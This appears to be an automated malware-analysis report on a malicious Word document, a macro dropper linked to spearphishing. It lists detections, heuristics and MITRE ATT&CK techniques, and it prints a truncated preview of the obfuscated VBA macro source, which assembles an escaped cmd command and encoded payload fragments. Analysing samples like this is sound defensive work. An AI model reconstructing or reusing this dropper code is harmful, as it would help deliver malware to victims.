MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV detection and medium heuristic for VBA macros indicate a malicious dropper. The VBA macros are heavily obfuscated, but their structure suggests they are designed to download and execute a second-stage payload. The legacy WordBasic AutoOpen marker also points to an older infection vector, likely spearphishing.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-7551741-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7551741-0
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 81,152 bytes but its declared streams total only 39,403 bytes — 41,749 bytes (51%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9496 bytes |
SHA-256: 14e55f5af7fb2f81dc5a36d2af45ff6a50c7c9602ebc7f433cc19bb4afda363d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "TlGDwozEkCdrB" Function YJzAntBCW() On Error Resume Next Error jZQhW / 6012 / 75010 * TSBRw Error TDOUc / sFalDk Error 86899 * hbpawV UGUXAz = "MD /v^" + ":^" + " ^ ^ " + " /r " + " " + CStr(Chr(GcqwpJaKI + ndsCifZXXbKzbi + 34 + VpFFiKWwmlETb + pMnPirYnG)) + " ^" + "s^Et" + " " + "P^" + "d=^=" Error 93843 * hsjdkz rTJjc = "=^A" + "^A" + "gAAIA^" + "A" + "C^A^gA" + "AI" + "AACA" + "^gAA^I^" + "AAC^" Error wZMYZw * zYFtQd * 59388 * niiiO Error GjwTL * SlisVr Error 95089 / DOuNI * 1460 * vQJOz XqncitJXktd = "A^g^AAI" + "^AAC" + "Ag^" + "AAI" + "A^AC^" + "Ag" + "^A^AI^A" + "^0" + "^H^A^9B" + "^w^e" + "AgG" Error 96959 / hrOnNj * vVbZD * 24619 Error 50352 * lJKqa Error 6883 * wVlRkC / 83251 / Clwqz jsfBvXPvORl = "Aj^" + "B" + "^A^d^AE" + "^" + "G" + "^AjB^" + "Qf^" + "AsD^ArB" + "Q^Y^A" Error 76623 * DSYCU * QWCUw / czjGHU Error OcOsj / pnHPc * 25901 / MKEWwk qDQQicdr = "^U^GA^y" + "B^gY" + "AsD^AzB" + "^gY^A" + "^0E^" + "A^" + "k" + "^A^AI" YJzAntBCW = UGUXAz + rTJjc + XqncitJXktd + jsfBvXPvORl + qDQQicdr Error LZwLE / pomcFS Error vTdsU / 44546 / MIRBjN * QqQsN Error zHzFJR / jOhTi End Function Function hqNLz() On Error Resume Next Error 34002 / ndMoLK / TMrsmA * ZPVCjf Error 62940 * QbvYVo Error dbhDul / hEZDzQ * 46507 / aVmUk fvnQDbpw = "^A0^G^A" + "l" + "^BA" + "dA" + "^" Error 55856 / KJAXB * 77114 * PiWIAm Error zuQbwM * tHHNJm VrKcfjhd = "k" + "EA^t^" + "A" + "Q^Z^" + "A^s^GA" + "vB" + "gdA^" + "4^" + "GAJ" + "B^w^" Error 75202 * jPuujf / jwlim * mErmYW SoswLiMPfIT = "OAkCA" + "zB^gY^" + "A^" + "0E" + "Ak" + "AAI^A^" + "w" Error 66932 * bduoC Error 84803 * zBzbE * 54251 * uVaWD pazpalz = "CA" + "vBg^eAw" + "^GAk" + "AA" + "^KAU^" + "GA^s" + "^B^Q" Error ZrjKMH * YBwzi * WdWCAM * fMCnl Error WGYSV * ISQHit / 52776 * 14239 Error jIJRz / HopGiY * rzTGG / pLLpn Error 55687 * kEIznP * KrGvtm / CHsqJ pjkfSickd = "aAYEA" + "k^BQY^A" + "8^G" + "A" + "^sB" Error 57359 / shDNPX * 12216 * NzWwUM Error 38468 / RPcti Error aOFRX / PNZpj Error 7208 / YQjMo / pbHJN * sZcEuS YFQHjOwTCdV = "g^" + "b^AcH^A" + "v" + "^B" + "AR" + "^A^4C^A" + "YBg" + "^" + "d^Ac" + "HAk^Aw" Error 23376 / kkBNB Error iwmAS / NAhJYi / loLrit * onPjp Error 17587 * bOzYFX / 458 / MYSudt Error 98075 / ljqtM * 81682 / 82083 homHA = "e" + "^AkH" + "Ay^B" + "^A^dA" + "s^HA^p^" + "AA" hqNLz = fvnQDbpw + VrKcfjhd + SoswLiMPfIT + pazpalz + pjkfSickd + YFQHjOwTCdV + homHA Error YTKzZJ * HwSLza Error iSvNl / CEPRYC Error 34466 * fXvZJj * 14523 * UviCLY End Function Function ZNJizjw() On Error Resume Next Error 18655 * uOCUL * SUWmn * qYIGYm HtrBuYTCi = "^a^As^" + "EA^" + "M^B^A^J" + "^A^ACAu" + "^B^Q^a" + "^A^AC^" + "Av^Bg^e" + "Aw^" + "GAkAA" + "KA^g^G" Error awLAa * zDbOqI / dSzZz / VTwzbj Error GimlH * jwpok Error 38241 / ivzEZj Error 30226 / tiWOu / AGjJoF / 32748 MLipMAnz = "Aj^B" + "Q" + "Y^AU" + "GAy^Bw" + "bA^YG^A" + "7A^wJ^A" Error 77883 * PbpDz Error knsSW / ZJfWqE * isAFG / 44037 Error 22232 / HiPDc * kQGbtZ * dikifc ZKwlJC = "U^G" + "^A^4^B^" + "Q" + "Z^A^4" + "CAnA" + "wK^A" + "o^F^A^H" + "B^" Error 2153 / lCbwSn / YCMGV * BGSzJb SsOMwEnPTF = "QbA^QC^" + "Ar^AwJ" + "Aw^F" + "^An" + "^A^wK^A" + "M" + "GA^pB" + "A" Error 74994 / 400 * GYwMib * Kmmvvq Error VRznr / NFwwn Error 23308 * 27080 Error EUZWbj / aBUjrG * 31569 * 90074 lwTSrkwt = "bA^IG" + "A1" + "B^Ac^A" + "^o^D" + "^A^" + "2B" + "^g^b" + "^A^" Error FlMzM / MQclJ hSrwnJzQ = "UGA^kA^" + "Q^P^A^" + "M^H^A" + "i^B" + "^QTA" + "QC" + "A7^A" + "wJ^AkD" + "^A3^AQ" + "NA" + "c" Error habJC * PDJIN / 51104 / lzMjk Error ZUjBr / XkNszw / mfjlGZ / uwjzXd Error 12064 * EFSnGJ / 16736 * 75003 UwSrHN = "CA^g^" + "AQ^P" + "^A" + "^AC^A^" + "a^B" + "^wR^" Error SNkfp * LPjQF Error ZKQXao * dNmqvU Error 77957 / dYtDmM PBvZzSq = "A^0G^" + "Ak^A^w^" + "O" + "A^" + "kC^A" + "n^A" + "^AQ^" + "Ac" + "C^Ao" Error EaujVB / LvQmfO * wZHRZv / TwPZB Error nzTmL / MrPJPm / unbWS * NcjMX tjdof = ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.